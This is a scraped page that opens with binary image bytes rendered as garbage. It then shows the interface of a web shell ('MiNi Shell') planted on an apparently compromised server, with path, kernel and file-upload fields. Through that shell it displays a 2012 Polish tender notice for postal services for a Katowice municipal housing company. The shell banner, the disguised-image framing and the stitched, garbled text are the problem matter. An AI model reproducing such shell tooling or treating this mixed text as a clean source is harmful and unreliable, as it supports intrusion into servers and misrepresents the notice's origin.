JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121019/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121019/223241-N-2012.html

<p class="kh_header"><b>Katowice: Świadczenie usług pocztowych w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych o wadze do i powyżej 50 g w obrocie krajowym i zagranicznym oraz ich ewentualnych zwrotów</b><br>
<b>Numer ogłoszenia: 223241 - 2012; data zamieszczenia: 19.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komunalny Zakład Gospodarki Mieszkaniowej , ul. Grażyńskiego 5, 40-126 Katowice, woj. śląskie, tel. 032 2582021, 3141620, faks 032 3141620.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kzgm.katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług pocztowych w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych o wadze do i powyżej 50 g w obrocie krajowym i zagranicznym oraz ich ewentualnych zwrotów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi pocztowe w rozumieniu art. 3 pkt. 25 Prawa pocztowego, polegające na świadczeniu usług pocztowych w obrocie krajowym i zagranicznym na rzecz Komunalnego Zakładu Gospodarki Mieszkaniowej w Katowicach w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych o wadze do i powyżej 50 g oraz ewentualnych ich zwrotów.
Powszechne usługi pocztowe będące przedmiotem zamówienia świadczone będą na rzecz Komunalnego Zakładu Gospodarki Mieszkaniowej w Katowicach w niżej wymienionych lokalizacjach:
a)	KZGM, 40-126 Katowice ul. Grażyńskiego 5;
b)	KZGM, 40-877 Katowice ul. Mieszka I 2;
c)	KZGM, 40-127 Katowice Pl. Grunwaldzki 4;
d)	KZGM, 40-057 Katowice ul. Warszawska 53;
e)	KZGM OEB NR 1, 40-173 Katowice ul. Katowicka 46b;
f)	KZGM OEB NR 2, 40-383 Katowice ul. Ks. Bpa Bednorza 60;
g)	KZGM OEB NR 3, 40-093 Katowice ul. Słowackiego 18;
h)	KZGM OEB NR 4, 40-057 Katowice ul. PCK 2;
i)	KZGM OEB NR 5, 40-717 Katowice ul. Koszalińska 2d;
j)	KZGM OEB NR 6, 40-855 Katowice ul. Janasa 6.
Wykaz ilości przesyłek stanowi załącznik nr 1A do SIWZ - formularz cenowy. Podane w formularzu szacunkowe ilości przesyłek sporządzone zostały w oparciu o dane z ostatniego roku kalendarzowego i służą jedynie orientacyjnemu określeniu wielkości przedmiotu zamówienia.
Przesyłki nadawane przez Zamawiającego będą dostarczane przez Wykonawcę do każdego miejsca w kraju i zagranicą.
Przez przesyłki pocztowe będące przedmiotem zamówienia rozumie się:
a)	przesyłki listowe nierejestrowane krajowe i zagraniczne o wadze do i powyżej 50 g,
b)	przesyłki listowe rejestrowane nadane i doręczane za pokwitowaniem lub z potwierdzeniem odbioru o wadze powyżej 50 g krajowe i zagraniczne,
c)	paczki krajowe i zagraniczne - przesyłki rejestrowane zawierające rzeczy, z uwzględnieniem podziału na przesyłki ekonomiczne i priorytetowe oraz gabarytów określonych w Rozporządzeniu Ministra Infrastruktury z dnia 9 stycznia 2004 w sprawie warunków wykonywania powszechnych usług pocztowych (Dz.U. z 2004 nr 5 poz. 34 ze zm.).
2.	Zamawiający wymaga od Wykonawcy spełnienia następujących warunków w zakresie świadczenia usług:
a)	dostarczania przesyłek do adresatów w kopertach oryginalnych, przekazanych przez Zamawiającego;
b)	dostarczania przychodzących przesyłek pocztowych co najmniej raz dziennie w dni robocze od poniedziałku do piątku w godz. 7:00 -15:00 do lokalizacji wymienionych w ust. 1 pkt. 3;
c)	umożliwienia nadania przesyłek przez upoważnionych pracowników Zamawiającego co najmniej jeden raz dziennie w dni robocze od poniedziałku do piątku, w wybranych 
i uzgodnionych z Zamawiającym placówkach Wykonawcy (Wykaz placówek Wykonawcy stanowi załącznik nr 5 do projektu umowy);
d)	każdorazowego dokumentowania przyjęcia przesyłek do wyekspediowania pieczęcią, podpisem i datą w książce nadawczej (dla przesyłek rejestrowanych) oraz w zestawieniu ilościowym przesyłek wg poszczególnych kategorii wagowych (dla przesyłek zwykłych);
e)	wpisywania do pocztowej książki nadawczej ceny dla każdej nadanej przesyłki pocztowej, odpowiadającej jej wadze i rodzajowi oraz sumy cen za wszystkie nadane danego dnia przesyłki pocztowe rejestrowane;
f)	zapewnienia przez Wykonawcę wszelkich oznaczeń przesyłek rejestrowanych 
i priorytetowych oraz wzorów druków potwierdzenie odbioru; 
g)	doręczania do siedziby Zamawiającego pokwitowania przez adresata potwierdzenia odbioru, niezwłocznie po dokonaniu doręczenia przesyłki, nie później niż w ciągu 7 dni roboczych od dnia doręczenia;
h)	Wykonawca  będzie doręczał Zamawiającemu pokwitowane przez adresata potwierdzenie odbioru przesyłki niezwłocznie po jej doręczeniu. W przypadku nieobecności adresata, przedstawiciel Wykonawcy pozostawi zawiadomienie  o próbie doręczenia przesyłki (awizo) ze wskazaniem, gdzie i kiedy adresat może odebrać przesyłkę w terminie 7 kolejnych dni, licząc od dnia następnego po dniu zostawienia zawiadomienia u adresata. Jeżeli adresat nie zgłosi się po odbiór przesyłki w w/w terminie Wykonawca sporządzi powtórne zawiadomienie po  upływie 7-go dnia o możliwości jej odbioru w terminie kolejnych 7 dni. Po upływie terminu odbioru przesyłka niezwłocznie zwracana jest Zamawiającemu wraz z podaniem przyczyny nie odebrania przez adresata;
i)	nadania przesyłek objętych przedmiotem zamówienia w dniu ich odbioru od Zamawiającego;
j)	doręczania przesyłek listowych krajowych przyjętych do przemieszczenia i doręczenia: 
w dniu następnym jednak nie później niż w 4 dniu po dniu nadania w przypadku przesyłek listowych najszybszej kategorii, w dniu następnym jednak nie później niż w 6 dniu po dniu nadania w przypadku przesyłki nie będącej przesyłką najszybszej kategorii;
k)	usługę pocztową w zakresie przesyłki rejestrowanej uważa się za nie wykonaną jeżeli doręczenie przesyłki rejestrowanej lub zawiadomienie o próbie jej doręczenia nie nastąpiło 
w terminie 20 dni od dnia nadania, z zastrzeżeniem pkt. 11;
l)	zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 9 stycznia 2004 r. w sprawie warunków wykonywania powszechnych usług pocztowych (Dz.U. z 2004 nr 5 poz. 34 ze zm.) Wykonawca powinien posiadać odpowiednią określoną w ww. rozporządzeniu ilość placówek zdawczo-odbiorczych. Placówki powinny być czynne min. 5 dni w tygodniu.
3.	Reklamacje:
a)	reklamację z tytułu niewykonania usługi Zamawiający może zgłosić do Wykonawcy po upływie 14 dni od nadania przesyłki rejestrowanej, nie później jednak niż 12 miesięcy od ich nadania,
b)	Termin udzielenia odpowiedzi na reklamację nie może przekroczyć 30 dni od dnia otrzymania reklamacji.
54.	Zobowiązania Zamawiającego:
a)	Zamawiający zobowiązuje się do umieszczenia na przesyłce listowej lub paczce:
- nazwy odbiorcy wraz z jego adresem, określając rodzaj przesyłki (zwykła, polecona, priorytet czy ze zwrotnym potwierdzeniem odbioru),
- na stronie adresowej każdej nadawanej przesyłki nadruku (pieczątki) określającej pełną nazwę i adres Zamawiającego,
- w miejscu przeznaczonym na znak opłaty pocztowej odcisku pieczęci według wzoru uzgodnionego z Wykonawcą (wzór znaku opłaty pocztowej stanowi załącznik nr 4 do projektu umowy);
b)	Zamawiający zobowiązuje się do nadawania przesyłek w stanie uporządkowanym, przez co należy rozumieć:
- dla przesyłek rejestrowanych - wpisanie każdej przesyłki do książki nadawczej w dwóch egzemplarzach - jeden dla Wykonawcy, drugi dla Zamawiającego jako potwierdzenie nadania danej partii przesyłek,
- dla przesyłek nie rejestrowanych  - zestawienie ilościowe przesyłek sporządzane dla celów rozliczeniowych w dwóch egzemplarzach- jeden dla Wykonawcy, drugi dla Zamawiającego jako potwierdzenie nadania danej partii przesyłek;
c)	nadawanie przesyłek pocztowych będzie dokonywane przy użyciu pocztowej książki nadawczej, na podstawie zestawienia z odciśniętą pieczątką firmową, sporządzonego w dwóch identycznych egzemplarzach oraz przy użyciu wypełnionego samokopiującego arkusza nadawczego, zatwierdzonego przez Wykonawcę;
d)	Zamawiający będzie korzystał wyłącznie ze swojego opakowania przesyłek.
5.	Zasady realizacji przedmiotu zamówienia:
Przedmiot zamówienia będzie realizowany na zasadach określonych w powszechnie obowiązujących przepisach prawa, w szczególności w:
a)	Ustawie z dnia 12 czerwca 2003 r. - Prawo pocztowe (tekst jednolity Dz.U. z 2008 r. nr 189, poz. 1159 ze zm.),
b)	Rozporządzeniu Ministra Infrastruktury z dnia 13 października 2003 r. w sprawie reklamacji powszechnej usługi pocztowej w zakresie przesyłki rejestrowanej i przekazu pocztowego (Dz.U. z 2003 r. nr 183, poz. 1795),
c)	Rozporządzeniu Ministra Infrastruktury z dnia 9 stycznia 2004 r. w sprawie warunków wykonywania powszechnych usług pocztowych (Dz.U. z 2004 r.  nr 5 poz. 34 ze zm.),
d)	Międzynarodowych przepisach pocztowych: ratyfikowanej umowie międzynarodowej ogłoszonej w dniu 8 listopada 2007 r. (Dz. U. Z 2007 r. nr 206 poz. 1494), Regulaminie Poczty Listowej (Dz. U. z 2007 r. nr 108, poz. 744);
e)	Kodeksie postępowania cywilnego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy stanowiących nie więcej niż 50% wartości zamówienia podstawowego. W przypadku udzielenia zamówień uzupełniających wykonawca wykona je na odrębne zlecenie zamawiającego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 64.11.00.00-0, 64.10.00.00-7, 64.11.20.00-4, 64.11.30.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każdy wykonawca zobowiązany jest wnieść wadium zgodnie z art. 45 ustawy w wysokości: 4.000,00 zł.
2. Termin wniesienia wadium: do upływu terminu składania ofert, tj. do dnia 30.10.2012 r. do godz. 8:45.
3.	Wadium może być wnoszone w formach przewidzianych w art. 45 ustawy.
4. Wadium w pieniądzu należy wpłacić przelewem na konto zamawiającego:
Komunalny Zakład Gospodarki Mieszkaniowej w Katowicach
Nazwa banku: ING Bank Śląski S.A. O / Katowice
Nr rachunku: 13 1050 1214 1000 0023 3495 0603
W tytule przelewu należy wpisać: 
Wadium na: Świadczenie usług pocztowych w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych o wadze do i powyżej 50 g w obrocie krajowym i zagranicznym oraz ich ewentualnych zwrotów.
W przypadku wadium wnoszonego w pieniądzu termin wniesienia wadium zostanie dotrzymany, jeżeli wadium będzie na koncie Zamawiającego przed upływem terminu składania ofert. 
Do oferty należy dołączyć dokument potwierdzający wniesienie wadium w formie pieniądza.
Oryginał wadium wniesionego w formie innej niż pieniądz należy złożyć wraz z ofertą w osobnej kopercie, natomiast kopię tego dokumentu, potwierdzoną za zgodność z oryginałem, należy dołączyć do oferty. 
Zwrot wadium dokonany będzie zgodnie z zapisami art. 46 ustawy.
Zamawiający zatrzymuje wadium wraz z odsetkami, gdy nastąpią okoliczności przewidziane w art. 46 ust. 4a i ust. 5 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca wykaże, że posiada aktualne zezwolenie Prezesa Urzędu Komunikacji Elektronicznej na wykonywanie działalności pocztowej w zakresie przyjmowania, przemieszczania i doręczania przesyłek w obrocie krajowym i zagranicznym zgodnie z art. 6 ust. 1 ustawy Prawo pocztowe z dnia 12.06.2003 r. (Dz. U. z 2008 r. nr 189 poz. 1159 ze zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca wykaże, że wykonał/wykonuje w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, co najmniej dwóch usług  polegających na świadczeniu powszechnych usług pocztowych, każda o wartości nie mniejszej niż 75.000,00 zł brutto</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku wykonawca musi złożyć oświadczenie z art 22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku wykonawca musi złożyć oświadczenie z art 22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku wykonawca musi złożyć oświadczenie z art 22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	wypełniony formularz OFERTA - załącznik nr 1 do SIWZ; 
b)	wypełniony formularz cenowy - załącznik nr 1A do SIWZ;
c)	pełnomocnictwo do reprezentowania wykonawcy (podpisującego ofertę), jeżeli nie wynika ono z dokumentów wymienionych w pkt 2b - pełnomocnictwo należy dołączyć w oryginale bądź kopii, notarialnie potwierdzonej za zgodność z oryginałem;
d)	zakres zamówienia jaki zostanie powierzony podwykonawcom - załącznik nr 6 do SIWZ
e)	oświadczenie, o akceptacji warunków płatności określonych przez Zamawiającego             - zgodnie z załącznikiem nr 1 do SIWZ,
f)	oświadczenie, o zapoznaniu się z warunkami zamówienia i ich akceptacji bez zastrzeżeń    - zgodnie z załącznikiem nr 1 do SIWZ,
g)	oświadczenie, o związaniu ofertą na czas wskazany w specyfikacji - zgodnie z załącznikiem nr 1 do SIWZ, 
h)	oświadczenie, o zapoznaniu się z projektem umowy i akceptacji bez zastrzeżeń - zgodnie z załącznikiem nr 1 do SIWZ,
i)	oświadczenie, iż oferowany przedmiot zamówienia jest zgodny z wymaganiami i warunkami opisanymi w ustawie oraz określonymi przez zamawiającego w SIWZ -  zgodnie z załącznikiem nr 1 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany umowy w zakresie określonym w § 7 ust. 2 projektu umowy stanowiącego załącznik nr 7 do SIWZ.
Zmiany wymagają formy pisemnej pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kzgm.katowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Organizacji Przetargów, ul. Mieszka I 2, 40-877 Katowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.10.2012 godzina 08:45, miejsce: 40-126 Katowice, ul. Grażyńskiego 5 - sekretariat, I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Dotyczy Sekcji II.2) - Usługa realizowana sukcesywnie przez 12 miesięcy, tj. od 01.01.2013 r. do 31.12.2013 r. lub wcześniejszego wyczerpania kwoty, na jaką
zostanie zawarta umowa.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com